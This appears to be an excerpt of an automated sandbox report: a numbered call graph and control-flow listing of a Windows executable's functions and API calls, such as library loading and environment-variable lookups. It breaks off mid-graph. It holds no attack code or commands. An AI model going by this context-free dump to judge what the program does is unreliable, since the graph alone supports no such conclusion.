69214 7ff62c1102d8 EnterCriticalSection 69177->69214 69189->69119 69190->69127 69202->69161 69203->69162 69204->69172 69205->69164 69206->69169 69207->69165 69208->69168 69210 7ff62c10a913 69209->69210 69213 7ff62c10a614 14 API calls 3 library calls 69210->69213 69212 7ff62c10a92e GetCurrentProcess TerminateProcess 69213->69212 69216 7ff62c1004ce 69215->69216 69217 7ff62c10048e 69215->69217 69216->69217 69218 7ff62c1004da 69216->69218 69227 7ff62c10a814 37 API calls 2 library calls 69217->69227 69226 7ff62c10546c EnterCriticalSection 69218->69226 69221 7ff62c1004b5 69221->69002 69222 7ff62c1004df 69223 7ff62c1005e8 71 API calls 69222->69223 69224 7ff62c1004f1 69223->69224 69225 7ff62c105478 _fread_nolock LeaveCriticalSection 69224->69225 69225->69221 69227->69221 69229 7ff62c100b0c 69228->69229 69238 7ff62c10082c 69229->69238 69231 7ff62c100b2a 69231->69023 69232->69008 69233->69012 69234->69019 69235->69016 69236->69019 69237->69019 69239 7ff62c10084c 69238->69239 69244 7ff62c100879 69238->69244 69240 7ff62c100881 69239->69240 69241 7ff62c100856 69239->69241 69239->69244 69245 7ff62c10076c 69240->69245 69252 7ff62c10a814 37 API calls 2 library calls 69241->69252 69244->69231 69253 7ff62c10546c EnterCriticalSection 69245->69253 69247 7ff62c100789 69248 7ff62c1007ac 74 API calls 69247->69248 69249 7ff62c100792 69248->69249 69250 7ff62c105478 _fread_nolock LeaveCriticalSection 69249->69250 69251 7ff62c10079d 69250->69251 69251->69244 69252->69244 69255 7ff62c0ffe43 69254->69255 69256 7ff62c0ffe71 69254->69256 69265 7ff62c10a814 37 API calls 2 library calls 69255->69265 69263 7ff62c0ffe63 69256->69263 69264 7ff62c10546c EnterCriticalSection 69256->69264 69259 7ff62c0ffe88 69260 7ff62c0ffea4 72 API calls 69259->69260 69261 7ff62c0ffe94 69260->69261 69262 7ff62c105478 _fread_nolock LeaveCriticalSection 69261->69262 69262->69263 69263->69028 69265->69263 69267 7ff62c1003b4 69266->69267 69268 7ff62c1003e6 69266->69268 69267->68963 69268->69267 69269 7ff62c1003f5 __scrt_get_show_window_mode 69268->69269 69270 7ff62c100432 69268->69270 69280 7ff62c104f08 11 API calls _get_daylight 69269->69280 69279 7ff62c10546c EnterCriticalSection 69270->69279 69272 7ff62c10043a 69275 7ff62c10013c _fread_nolock 51 API calls 69272->69275 69274 7ff62c10040a 69281 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69274->69281 69277 7ff62c100451 69275->69277 69278 7ff62c105478 _fread_nolock LeaveCriticalSection 69277->69278 69278->69267 69280->69274 69281->69267 69286 7ff62c1049de 69282->69286 69283 7ff62c104a03 69300 7ff62c10a814 37 API calls 2 library calls 69283->69300 69285 7ff62c104a3f 69301 7ff62c102c10 49 API calls _invalid_parameter_noinfo 69285->69301 69286->69283 69286->69285 69288 7ff62c104ad6 69289 7ff62c104b1c 69288->69289 69293 7ff62c104af1 69288->69293 69294 7ff62c104b40 69288->69294 69297 7ff62c104ae8 69288->69297 69291 7ff62c10a948 __free_lconv_mon 11 API calls 69289->69291 69290 7ff62c0fc550 _log10_special 8 API calls 69292 7ff62c0f1cc8 69290->69292 69299 7ff62c104a2d 69291->69299 69292->68933 69302 7ff62c10a948 69293->69302 69294->69289 69295 7ff62c104b4a 69294->69295 69298 7ff62c10a948 __free_lconv_mon 11 API calls 69295->69298 69297->69289 69297->69293 69298->69299 69299->69290 69300->69299 69301->69288 69303 7ff62c10a94d HeapFree 69302->69303 69304 7ff62c10a97c 69302->69304 69303->69304 69305 7ff62c10a968 GetLastError 69303->69305 69304->69299 69306 7ff62c10a975 __free_lconv_mon 69305->69306 69308 7ff62c104f08 11 API calls _get_daylight 69306->69308 69308->69304 69309 7ffdfab7eff0 69310 7ffdfab7f0f7 69309->69310 69311 7ffdfab7f011 69309->69311 69311->69310 69313 7ffdfab7e7d0 69311->69313 69314 7ffdfab7e9fb 69313->69314 69316 7ffdfab7e7fa 69313->69316 69314->69310 69316->69314 69317 7ffdfab80610 24 API calls 69316->69317 69319 7ffdfab7f6a0 69316->69319 69328 7ffdfab7d7a0 21 API calls 69316->69328 69317->69316 69320 7ffdfab7f6b2 69319->69320 69323 7ffdfab7f6ea 69319->69323 69321 7ffdfab7f6bc 69320->69321 69320->69323 69329 7ffdfab7d7a0 21 API calls 69321->69329 69322 7ffdfab7f73b 69322->69316 69323->69322 69330 7ffdfab7d7a0 21 API calls 69323->69330 69326 7ffdfab7f6e4 69326->69316 69327 7ffdfab7f735 69327->69316 69328->69316 69329->69326 69330->69327 69331 7ff62c0fbae0 69332 7ff62c0fbb0e 69331->69332 69333 7ff62c0fbaf5 69331->69333 69333->69332 69336 7ff62c10d5fc 69333->69336 69337 7ff62c10d647 69336->69337 69341 7ff62c10d60b _get_daylight 69336->69341 69344 7ff62c104f08 11 API calls _get_daylight 69337->69344 69339 7ff62c10d62e HeapAlloc 69340 7ff62c0fbb6e 69339->69340 69339->69341 69341->69337 69341->69339 69343 7ff62c113590 EnterCriticalSection LeaveCriticalSection _get_daylight 69341->69343 69343->69341 69344->69340 69345 7ff62c10f98c 69346 7ff62c10fb7e 69345->69346 69348 7ff62c10f9ce _isindst 69345->69348 69392 7ff62c104f08 11 API calls _get_daylight 69346->69392 69348->69346 69351 7ff62c10fa4e _isindst 69348->69351 69349 7ff62c0fc550 _log10_special 8 API calls 69350 7ff62c10fb99 69349->69350 69366 7ff62c116194 69351->69366 69356 7ff62c10fbaa 69357 7ff62c10a900 _isindst 17 API calls 69356->69357 69359 7ff62c10fbbe 69357->69359 69363 7ff62c10faab 69365 7ff62c10fb6e 69363->69365 69391 7ff62c1161d8 37 API calls _isindst 69363->69391 69365->69349 69367 7ff62c10fa6c 69366->69367 69368 7ff62c1161a3 69366->69368 69373 7ff62c115598 69367->69373 69393 7ff62c1102d8 EnterCriticalSection 69368->69393 69370 7ff62c1161ab 69371 7ff62c1161bc 69370->69371 69372 7ff62c116004 55 API calls 69370->69372 69372->69371 69374 7ff62c10fa81 69373->69374 69375 7ff62c1155a1 69373->69375 69374->69356 69379 7ff62c1155c8 69374->69379 69394 7ff62c104f08 11 API calls _get_daylight 69375->69394 69377 7ff62c1155a6 69395 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69377->69395 69380 7ff62c1155d1 69379->69380 69384 7ff62c10fa92 69379->69384 69396 7ff62c104f08 11 API calls _get_daylight 69380->69396 69382 7ff62c1155d6 69397 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69382->69397 69384->69356 69385 7ff62c1155f8 69384->69385 69386 7ff62c10faa3 69385->69386 69387 7ff62c115601 69385->69387 69386->69356 69386->69363 69398 7ff62c104f08 11 API calls _get_daylight 69387->69398 69389 7ff62c115606 69399 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69389->69399 69391->69365 69392->69365 69394->69377 69395->69374 69396->69382 69397->69384 69398->69389 69399->69386 69400 7ff62c0fcc3c 69421 7ff62c0fce0c 69400->69421 69403 7ff62c0fcd88 69572 7ff62c0fd12c 7 API calls 2 library calls 69403->69572 69404 7ff62c0fcc58 __scrt_acquire_startup_lock 69406 7ff62c0fcd92 69404->69406 69412 7ff62c0fcc76 __scrt_release_startup_lock 69404->69412 69573 7ff62c0fd12c 7 API calls 2 library calls 69406->69573 69408 7ff62c0fcc9b 69409 7ff62c0fcd9d __FrameHandler3::FrameUnwindToEmptyState 69410 7ff62c0fcd21 69427 7ff62c0fd274 69410->69427 69412->69408 69412->69410 69569 7ff62c109b2c 45 API calls 69412->69569 69413 7ff62c0fcd26 69430 7ff62c0f1000 69413->69430 69418 7ff62c0fcd49 69418->69409 69571 7ff62c0fcf90 7 API calls 69418->69571 69420 7ff62c0fcd60 69420->69408 69422 7ff62c0fce14 69421->69422 69423 7ff62c0fce20 __scrt_dllmain_crt_thread_attach 69422->69423 69424 7ff62c0fce2d 69423->69424 69426 7ff62c0fcc50 69423->69426 69424->69426 69574 7ff62c0fd888 7 API calls 2 library calls 69424->69574 69426->69403 69426->69404 69575 7ff62c11a4d0 69427->69575 69429 7ff62c0fd28b GetStartupInfoW 69429->69413 69431 7ff62c0f1009 69430->69431 69577 7ff62c105484 69431->69577 69433 7ff62c0f37fb 69584 7ff62c0f36b0 69433->69584 69437 7ff62c0fc550 _log10_special 8 API calls 69439 7ff62c0f3ca7 69437->69439 69570 7ff62c0fd2b8 GetModuleHandleW 69439->69570 69440 7ff62c0f383c 69443 7ff62c0f1c80 49 API calls 69440->69443 69441 7ff62c0f391b 69442 7ff62c0f45c0 108 API calls 69441->69442 69444 7ff62c0f392b 69442->69444 69445 7ff62c0f385b 69443->69445 69446 7ff62c0f396a 69444->69446 69683 7ff62c0f7f90 69444->69683 69656 7ff62c0f8830 69445->69656 69692 7ff62c0f2710 54 API calls _log10_special 69446->69692 69450 7ff62c0f388e 69457 7ff62c0f38bb __std_exception_destroy 69450->69457 69682 7ff62c0f89a0 40 API calls __std_exception_destroy 69450->69682 69451 7ff62c0f395d 69452 7ff62c0f3984 69451->69452 69453 7ff62c0f3962 69451->69453 69456 7ff62c0f1c80 49 API calls 69452->69456 69455 7ff62c10004c 74 API calls 69453->69455 69455->69446 69458 7ff62c0f39a3 69456->69458 69459 7ff62c0f8830 14 API calls 69457->69459 69467 7ff62c0f38de __std_exception_destroy 69457->69467 69462 7ff62c0f1950 115 API calls 69458->69462 69459->69467 69461 7ff62c0f3a0b 69695 7ff62c0f89a0 40 API calls __std_exception_destroy 69461->69695 69464 7ff62c0f39ce 69462->69464 69464->69445 69466 7ff62c0f39de 69464->69466 69465 7ff62c0f3a17 69696 7ff62c0f89a0 40 API calls __std_exception_destroy 69465->69696 69693 7ff62c0f2710 54 API calls _log10_special 69466->69693 69472 7ff62c0f390e __std_exception_destroy 69467->69472 69694 7ff62c0f8940 40 API calls __std_exception_destroy 69467->69694 69470 7ff62c0f3a23 69697 7ff62c0f89a0 40 API calls __std_exception_destroy 69470->69697 69473 7ff62c0f8830 14 API calls 69472->69473 69474 7ff62c0f3a3b 69473->69474 69475 7ff62c0f3b2f 69474->69475 69476 7ff62c0f3a60 __std_exception_destroy 69474->69476 69699 7ff62c0f2710 54 API calls _log10_special 69475->69699 69486 7ff62c0f3aab 69476->69486 69698 7ff62c0f8940 40 API calls __std_exception_destroy 69476->69698 69479 7ff62c0f8830 14 API calls 69480 7ff62c0f3bf4 __std_exception_destroy 69479->69480 69481 7ff62c0f3d41 69480->69481 69482 7ff62c0f3c46 69480->69482 69704 7ff62c0f44e0 49 API calls 69481->69704 69483 7ff62c0f3cd4 69482->69483 69484 7ff62c0f3c50 69482->69484 69488 7ff62c0f8830 14 API calls 69483->69488 69700 7ff62c0f90e0 59 API calls _log10_special 69484->69700 69486->69479 69491 7ff62c0f3ce0 69488->69491 69489 7ff62c0f3d4f 69492 7ff62c0f3d65 69489->69492 69493 7ff62c0f3d71 69489->69493 69490 7ff62c0f3c55 69495 7ff62c0f3cb3 69490->69495 69496 7ff62c0f3c61 69490->69496 69491->69496 69499 7ff62c0f3ced 69491->69499 69705 7ff62c0f4630 69492->69705 69494 7ff62c0f1c80 49 API calls 69493->69494 69509 7ff62c0f3d2b __std_exception_destroy 69494->69509 69702 7ff62c0f8660 86 API calls 2 library calls 69495->69702 69701 7ff62c0f2710 54 API calls _log10_special 69496->69701 69503 7ff62c0f1c80 49 API calls 69499->69503 69500 7ff62c0f3dbc 69504 7ff62c0f9390 2 API calls 69500->69504 69501 7ff62c0f3cbb 69505 7ff62c0f3cbf 69501->69505 69506 7ff62c0f3cc8 69501->69506 69507 7ff62c0f3d0b 69503->69507 69511 7ff62c0f3dcf SetDllDirectoryW 69504->69511 69505->69496 69506->69509 69508 7ff62c0f3d12 69507->69508 69507->69509 69703 7ff62c0f2710 54 API calls _log10_special 69508->69703 69509->69500 69510 7ff62c0f3da7 LoadLibraryExW 69509->69510 69510->69500 69515 7ff62c0f3e02 69511->69515 69557 7ff62c0f3e52 69511->69557 69514 7ff62c0f3808 __std_exception_destroy 69514->69437 69517 7ff62c0f8830 14 API calls 69515->69517 69516 7ff62c0f4000 69519 7ff62c0f402d 69516->69519 69520 7ff62c0f400a PostMessageW GetMessageW 69516->69520 69523 7ff62c0f3e0e __std_exception_destroy 69517->69523 69518 7ff62c0f3f13 69716 7ff62c0f33c0 121 API calls 2 library calls 69518->69716 69669 7ff62c0f3360 69519->69669 69520->69519 69522 7ff62c0f3f1b 69522->69514 69524 7ff62c0f3f23 69522->69524 69526 7ff62c0f3eea 69523->69526 69531 7ff62c0f3e46 69523->69531 69717 7ff62c0f90c0 LocalFree 69524->69717 69715 7ff62c0f8940 40 API calls __std_exception_destroy 69526->69715 69531->69557 69708 7ff62c0f6dc0 54 API calls _get_daylight 69531->69708 69539 7ff62c0f4053 69542 7ff62c0f3e64 69709 7ff62c0f7340 117 API calls 2 library calls 69542->69709 69546 7ff62c0f3e79 69548 7ff62c0f3e9a 69546->69548 69560 7ff62c0f3e7d 69546->69560 69710 7ff62c0f6e00 120 API calls _log10_special 69546->69710 69548->69560 69711 7ff62c0f71b0 125 API calls 69548->69711 69552 7ff62c0f3eaf 69552->69560 69712 7ff62c0f74f0 55 API calls 69552->69712 69554 7ff62c0f3ed8 69714 7ff62c0f6fc0 FreeLibrary 69554->69714 69557->69516 69557->69518 69560->69557 69713 7ff62c0f2a50 54 API calls _log10_special 69560->69713 69569->69410 69570->69418 69571->69420 69572->69406 69573->69409 69574->69426 69576 7ff62c11a4c0 69575->69576 69576->69429 69576->69576 69580 7ff62c10f480 69577->69580 69578 7ff62c10f4d3 69719 7ff62c10a814 37 API calls 2 library calls 69578->69719 69580->69578 69581 7ff62c10f526 69580->69581 69720 7ff62c10f358 71 API calls _fread_nolock 69581->69720 69583 7ff62c10f4fc 69583->69433 69721 7ff62c0fc850 69584->69721 69587 7ff62c0f3710 69723 7ff62c0f9280 FindFirstFileExW 69587->69723 69588 7ff62c0f36eb GetLastError 69728 7ff62c0f2c50 51 API calls _log10_special 69588->69728 69592 7ff62c0f3723 69729 7ff62c0f9300 CreateFileW GetFinalPathNameByHandleW CloseHandle 69592->69729 69593 7ff62c0f377d 69731 7ff62c0f9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 69593->69731 69595 7ff62c0fc550 _log10_special 8 API calls 69597 7ff62c0f37b5 69595->69597 69597->69514 69606 7ff62c0f1950 69597->69606 69598 7ff62c0f3730 69601 7ff62c0f3734 69598->69601 69602 7ff62c0f374c __vcrt_FlsAlloc 69598->69602 69599 7ff62c0f3706 69599->69595 69600 7ff62c0f378b 69600->69599 69732 7ff62c0f2810 49 API calls _log10_special 69600->69732 69730 7ff62c0f2810 49 API calls _log10_special 69601->69730 69602->69593 69605 7ff62c0f3745 69605->69599 69607 7ff62c0f45c0 108 API calls 69606->69607 69608 7ff62c0f1985 69607->69608 69609 7ff62c0f1c43 69608->69609 69610 7ff62c0f7f90 83 API calls 69608->69610 69611 7ff62c0fc550 _log10_special 8 API calls 69609->69611 69612 7ff62c0f19cb 69610->69612 69613 7ff62c0f1c5e 69611->69613 69614 7ff62c1006d4 73 API calls 69612->69614 69655 7ff62c0f1a03 69612->69655 69613->69440 69613->69441 69616 7ff62c0f19e5 69614->69616 69615 7ff62c10004c 74 API calls 69615->69609 69617 7ff62c0f1a08 69616->69617 69618 7ff62c0f19e9 69616->69618 69620 7ff62c10039c _fread_nolock 53 API calls 69617->69620 69733 7ff62c104f08 11 API calls _get_daylight 69618->69733 69622 7ff62c0f1a20 69620->69622 69621 7ff62c0f19ee 69734 7ff62c0f2910 54 API calls _log10_special 69621->69734 69623 7ff62c0f1a45 69622->69623 69624 7ff62c0f1a26 69622->69624 69629 7ff62c0f1a5c 69623->69629 69630 7ff62c0f1a7b 69623->69630 69735 7ff62c104f08 11 API calls _get_daylight 69624->69735 69627 7ff62c0f1a2b 69736 7ff62c0f2910 54 API calls _log10_special 69627->69736 69737 7ff62c104f08 11 API calls _get_daylight 69629->69737 69632 7ff62c0f1c80 49 API calls 69630->69632 69634 7ff62c0f1a92 69632->69634 69633 7ff62c0f1a61 69738 7ff62c0f2910 54 API calls _log10_special 69633->69738 69635 7ff62c0f1c80 49 API calls 69634->69635 69637 7ff62c0f1add 69635->69637 69638 7ff62c1006d4 73 API calls 69637->69638 69639 7ff62c0f1b01 69638->69639 69640 7ff62c0f1b35 69639->69640 69641 7ff62c0f1b16 69639->69641 69643 7ff62c10039c _fread_nolock 53 API calls 69640->69643 69739 7ff62c104f08 11 API calls _get_daylight 69641->69739 69645 7ff62c0f1b4a 69643->69645 69644 7ff62c0f1b1b 69740 7ff62c0f2910 54 API calls _log10_special 69644->69740 69647 7ff62c0f1b50 69645->69647 69648 7ff62c0f1b6f 69645->69648 69741 7ff62c104f08 11 API calls _get_daylight 69647->69741 69743 7ff62c100110 37 API calls 2 library calls 69648->69743 69651 7ff62c0f1b55 69742 7ff62c0f2910 54 API calls _log10_special 69651->69742 69652 7ff62c0f1b89 69652->69655 69744 7ff62c0f2710 54 API calls _log10_special 69652->69744 69655->69615 69657 7ff62c0f883a 69656->69657 69658 7ff62c0f9390 2 API calls 69657->69658 69659 7ff62c0f8859 GetEnvironmentVariableW 69658->69659 69660 7ff62c0f88c2 69659->69660 69661 7ff62c0f8876 ExpandEnvironmentStringsW 69659->69661 69663 7ff62c0fc550 _log10_special 8 API calls 69660->69663 69661->69660 69662 7ff62c0f8898 69661->69662 69745 7ff62c0f9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 69662->69745 69665 7ff62c0f88d4 69663->69665 69665->69450 69666 7ff62c0f88aa 69667 7ff62c0fc550 _log10_special 8 API calls 69666->69667 69668 7ff62c0f88ba 69667->69668 69668->69450 69746 7ff62c0f6360 69669->69746 69673 7ff62c0f3381 69677 7ff62c0f3399 69673->69677 69814 7ff62c0f6050 69673->69814 69675 7ff62c0f338d 69675->69677 69823 7ff62c0f61e0 54 API calls 69675->69823 69678 7ff62c0f3670 69677->69678 69679 7ff62c0f367e 69678->69679 69680 7ff62c0f368f 69679->69680 69877 7ff62c0f8e60 FreeLibrary 69679->69877 69718 7ff62c0f6fc0 FreeLibrary 69680->69718 69682->69457 69684 7ff62c0f7fb4 69683->69684 69685 7ff62c1006d4 73 API calls 69684->69685 69690 7ff62c0f808b __std_exception_destroy 69684->69690 69686 7ff62c0f7fd0 69685->69686 69686->69690 69878 7ff62c1078c8 69686->69878 69688 7ff62c1006d4 73 API calls 69691 7ff62c0f7fe5 69688->69691 69689 7ff62c10039c _fread_nolock 53 API calls 69689->69691 69690->69451 69691->69688 69691->69689 69691->69690 69692->69514 69693->69514 69694->69461 69695->69465 69696->69470 69697->69472 69698->69486 69699->69514 69700->69490 69701->69514 69702->69501 69703->69514 69704->69489 69706 7ff62c0f1c80 49 API calls 69705->69706 69707 7ff62c0f4660 69706->69707 69707->69509 69708->69542 69709->69546 69710->69548 69711->69552 69712->69560 69713->69554 69714->69557 69715->69557 69716->69522 69718->69539 69719->69583 69720->69583 69722 7ff62c0f36bc GetModuleFileNameW 69721->69722 69722->69587 69722->69588 69724 7ff62c0f92d2 69723->69724 69725 7ff62c0f92bf FindClose 69723->69725 69726 7ff62c0fc550 _log10_special 8 API calls 69724->69726 69725->69724 69727 7ff62c0f371a 69726->69727 69727->69592 69727->69593 69728->69599 69729->69598 69730->69605 69731->69600 69732->69599 69733->69621 69734->69655 69735->69627 69736->69655 69737->69633 69738->69655 69739->69644 69740->69655 69741->69651 69742->69655 69743->69652 69744->69655 69745->69666 69747 7ff62c0f6375 69746->69747 69748 7ff62c0f1c80 49 API calls 69747->69748 69749 7ff62c0f63b1 69748->69749 69750 7ff62c0f63dd 69749->69750 69751 7ff62c0f63ba 69749->69751 69753 7ff62c0f4630 49 API calls 69750->69753 69834 7ff62c0f2710 54 API calls _log10_special 69751->69834 69755 7ff62c0f63f5 69753->69755 69754 7ff62c0f63d3 69758 7ff62c0fc550 _log10_special 8 API calls 69754->69758 69756 7ff62c0f6413 69755->69756 69835 7ff62c0f2710 54 API calls _log10_special 69755->69835 69824 7ff62c0f4560 69756->69824 69761 7ff62c0f336e 69758->69761 69761->69677 69777 7ff62c0f6500 69761->69777 69762 7ff62c0f642b 69764 7ff62c0f4630 49 API calls 69762->69764 69765 7ff62c0f6444 69764->69765 69766 7ff62c0f6469 69765->69766 69767 7ff62c0f6449 69765->69767 69769 7ff62c0f8e80 3 API calls 69766->69769 69836 7ff62c0f2710 54 API calls _log10_special 69767->69836 69770 7ff62c0f6476 69769->69770 69771 7ff62c0f6482 69770->69771 69772 7ff62c0f64c1 69770->69772 69774 7ff62c0f9390 2 API calls 69771->69774 69838 7ff62c0f5830 137 API calls 69772->69838 69775 7ff62c0f649a GetLastError 69774->69775 69837 7ff62c0f2c50 51 API calls _log10_special 69775->69837 69839 7ff62c0f5400 69777->69839 69779 7ff62c0f6526 69780 7ff62c0f652e 69779->69780 69781 7ff62c0f653f 69779->69781 69864 7ff62c0f2710 54 API calls _log10_special 69780->69864 69846 7ff62c0f4c90 69781->69846 69785 7ff62c0f655c 69788 7ff62c0f656c 69785->69788 69791 7ff62c0f657d 69785->69791 69786 7ff62c0f654b 69865 7ff62c0f2710 54 API calls _log10_special 69786->69865 69866 7ff62c0f2710 54 API calls _log10_special 69788->69866 69789 7ff62c0f653a 69789->69673 69792 7ff62c0f659c 69791->69792 69793 7ff62c0f65ad 69791->69793 69867 7ff62c0f2710 54 API calls _log10_special 69792->69867 69795 7ff62c0f65bc 69793->69795 69796 7ff62c0f65cd 69793->69796 69868 7ff62c0f2710 54 API calls _log10_special 69795->69868 69850 7ff62c0f4d50 69796->69850 69800 7ff62c0f65dc 69869 7ff62c0f2710 54 API calls _log10_special 69800->69869 69801 7ff62c0f65ed 69803 7ff62c0f65fc 69801->69803 69804 7ff62c0f660d 69801->69804 69870 7ff62c0f2710 54 API calls _log10_special 69803->69870 69806 7ff62c0f661f 69804->69806 69808 7ff62c0f6630 69804->69808 69871 7ff62c0f2710 54 API calls _log10_special 69806->69871 69811 7ff62c0f665a 69808->69811 69872 7ff62c1072b0 73 API calls 69808->69872 69810 7ff62c0f6648 69873 7ff62c1072b0 73 API calls 69810->69873 69811->69789 69874 7ff62c0f2710 54 API calls _log10_special 69811->69874 69815 7ff62c0f6070 69814->69815 69815->69815 69816 7ff62c0f6099 69815->69816 69822 7ff62c0f60b0 __std_exception_destroy 69815->69822 69876 7ff62c0f2710 54 API calls _log10_special 69816->69876 69818 7ff62c0f60a5 69818->69675 69819 7ff62c0f61bb 69819->69675 69820 7ff62c0f1470 116 API calls 69820->69822 69821 7ff62c0f2710 54 API calls 69821->69822 69822->69819 69822->69820 69822->69821 69823->69677 69825 7ff62c0f456a 69824->69825 69826 7ff62c0f9390 2 API calls 69825->69826 69827 7ff62c0f458f 69826->69827 69828 7ff62c0fc550 _log10_special 8 API calls 69827->69828 69829 7ff62c0f45b7 69828->69829 69829->69762 69830 7ff62c0f8e80 69829->69830 69831 7ff62c0f9390 2 API calls 69830->69831 69832 7ff62c0f8e94 LoadLibraryExW 69831->69832 69833 7ff62c0f8eb3 __std_exception_destroy 69832->69833 69833->69762 69834->69754 69835->69756 69836->69754 69837->69754 69838->69754 69841 7ff62c0f542c 69839->69841 69840 7ff62c0f5434 69840->69779 69841->69840 69844 7ff62c0f55d4 69841->69844 69875 7ff62c106aa4 48 API calls 69841->69875 69842 7ff62c0f5797 __std_exception_destroy 69842->69779 69843 7ff62c0f47d0 47 API calls 69843->69844 69844->69842 69844->69843 69847 7ff62c0f4cc0 69846->69847 69848 7ff62c0fc550 _log10_special 8 API calls 69847->69848 69849 7ff62c0f4d2a 69848->69849 69849->69785 69849->69786 69851 7ff62c0f4d65 69850->69851 69852 7ff62c0f1c80 49 API calls 69851->69852 69853 7ff62c0f4db1 69852->69853 69854 7ff62c0f1c80 49 API calls 69853->69854 69863 7ff62c0f4e33 __std_exception_destroy 69853->69863 69855 7ff62c0f4df0 69854->69855 69858 7ff62c0f9390 2 API calls 69855->69858 69855->69863 69856 7ff62c0fc550 _log10_special 8 API calls 69857 7ff62c0f4e7e 69856->69857 69857->69800 69857->69801 69859 7ff62c0f4e06 69858->69859 69860 7ff62c0f9390 2 API calls 69859->69860 69861 7ff62c0f4e1d 69860->69861 69862 7ff62c0f9390 2 API calls 69861->69862 69862->69863 69863->69856 69864->69789 69865->69789 69866->69789 69867->69789 69868->69789 69869->69789 69870->69789 69871->69789 69872->69810 69873->69811 69874->69789 69875->69841 69876->69818 69877->69680 69879 7ff62c1078f8 69878->69879 69882 7ff62c1073d4 69879->69882 69881 7ff62c107911 69881->69691 69883 7ff62c1073ef 69882->69883 69884 7ff62c10741e 69882->69884 69893 7ff62c10a814 37 API calls 2 library calls 69883->69893 69892 7ff62c10546c EnterCriticalSection 69884->69892 69887 7ff62c10740f 69887->69881 69888 7ff62c107423 69889 7ff62c107440 38 API calls 69888->69889 69890 7ff62c10742f 69889->69890 69891 7ff62c105478 _fread_nolock LeaveCriticalSection 69890->69891 69891->69887 69893->69887 69894 7ffdfaba7d70 69895 7ffdfaba7d8f 69894->69895 69896 7ffdfaba7d82 69894->69896 69897 7ffdfaba7d97 69895->69897 69900 7ffdfaba7de2 69895->69900 69907 7ffdfab79330 16 API calls 69897->69907 69899 7ffdfaba7da8 69908 7ffdfab79330 16 API calls 69899->69908 69901 7ffdfaba5960 86 API calls 69900->69901 69904 7ffdfaba7e13 69901->69904 69903 7ffdfaba7dd2 69905 7ffdfac32470 66 API calls 69904->69905 69906 7ffdfaba7e3f 69905->69906 69907->69899 69908->69903 69909 7ffdfab92210 69910 7ffdfab9225b 69909->69910 69911 7ffdfab9226e strcmp 69910->69911 69912 7ffdfab92281 69910->69912 69911->69912 69913 7ffdfab76160 new[] 16 API calls 69912->69913 69918 7ffdfab922ea 69913->69918 69914 7ffdfaca2bc0 8 API calls 69916 7ffdfab923ac 69914->69916 69915 7ffdfab76160 new[] 16 API calls 69917 7ffdfab925cd 69915->69917 69928 7ffdfab9238f 69917->69928 69931 7ffdfab89260 69917->69931 69919 7ffdfab76160 new[] 16 API calls 69918->69919 69927 7ffdfab923d4 69918->69927 69918->69928 69921 7ffdfab92383 69919->69921 69922 7ffdfab923c9 memcpy 69921->69922 69921->69927 69921->69928 69922->69927 69923 7ffdfab92628 69925 7ffdfab926ac 69923->69925 69929 7ffdfab9279f 69923->69929 69930 7ffdfab7d970 25 API calls 69923->69930 69924 7ffdfab889c0 60 API calls 69924->69928 69926 7ffdfab887e0 16 API calls 69925->69926 69925->69929 69926->69929 69927->69915 69927->69928 69927->69929 69928->69914 69929->69924 69929->69928 69929->69929 69930->69925 69932 7ffdfab892e5 69931->69932 69933 7ffdfab8943d 69931->69933 69932->69933 69936 7ffdfab892fe 69932->69936 69934 7ffdfab89340 69933->69934 69938 7ffdfab76160 new[] 16 API calls 69933->69938 69935 7ffdfab76160 new[] 16 API calls 69934->69935 69950 7ffdfab89572 69934->69950 69937 7ffdfab8938f 69935->69937 69941 7ffdfab76160 new[] 16 API calls 69936->69941 69939 7ffdfab8939b memset 69937->69939 69937->69950 69951 7ffdfab89475 69938->69951 69940 7ffdfab89405 memcpy 69939->69940 69949 7ffdfab89629 69939->69949 69943 7ffdfab89427 memcpy 69940->69943 69944 7ffdfab895db 69940->69944 69942 7ffdfab89319 69941->69942 69945 7ffdfab89325 memcpy 69942->69945 69942->69950 69946 7ffdfab895de memcpy memcpy 69943->69946 69944->69946 69945->69934 69946->69949 69947 7ffdfab887e0 16 API calls 69948 7ffdfab89814 69947->69948 69948->69950 69956 7ffdfab84ea5 69948->69956 69953 7ffdfab896e4 69949->69953 69955 7ffdfab7ff80 27 API calls 69949->69955 69950->69923 69951->69934 69951->69950 69963 7ffdfac35c70 16 API calls 69951->69963 69953->69947 69953->69950 69955->69953 69957 7ffdfab76160 new[] 16 API calls 69956->69957 69958 7ffdfab84edf 69957->69958 69959 7ffdfab84eeb memset 69958->69959 69962 7ffdfab84f53 69958->69962 69960 7ffdfab84f01 69959->69960 69964 7ffdfab849a0 69960->69964 69962->69950 69963->69934 69965 7ffdfab849c3 69964->69965 69966 7ffdfab76160 new[] 16 API calls 69965->69966 69967 7ffdfab849df 69966->69967 69968 7ffdfab849e7 memset 69967->69968 69969 7ffdfab849f4 69967->69969 69968->69969 69969->69962

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 7ff62c0f1000-7ff62c0f3806 call 7ff62c0ffe18 call 7ff62c0ffe20 call 7ff62c0fc850 call 7ff62c1053f0 call 7ff62c105484 call 7ff62c0f36b0 14 7ff62c0f3814-7ff62c0f3836 call 7ff62c0f1950 0->14 15 7ff62c0f3808-7ff62c0f380f 0->15 21 7ff62c0f383c-7ff62c0f3856 call 7ff62c0f1c80 14->21 22 7ff62c0f391b-7ff62c0f3931 call 7ff62c0f45c0 14->22 16 7ff62c0f3c97-7ff62c0f3cb2 call 7ff62c0fc550 15->16 26 7ff62c0f385b-7ff62c0f389b call 7ff62c0f8830 21->26 27 7ff62c0f3933-7ff62c0f3960 call 7ff62c0f7f90 22->27 28 7ff62c0f396a-7ff62c0f397f call 7ff62c0f2710 22->28 35 7ff62c0f38c1-7ff62c0f38cc call 7ff62c104f30 26->35 36 7ff62c0f389d-7ff62c0f38a3 26->36 40 7ff62c0f3984-7ff62c0f39a6 call 7ff62c0f1c80 27->40 41 7ff62c0f3962-7ff62c0f3965 call 7ff62c10004c 27->41 42 7ff62c0f3c8f 28->42 48 7ff62c0f38d2-7ff62c0f38e1 call 7ff62c0f8830 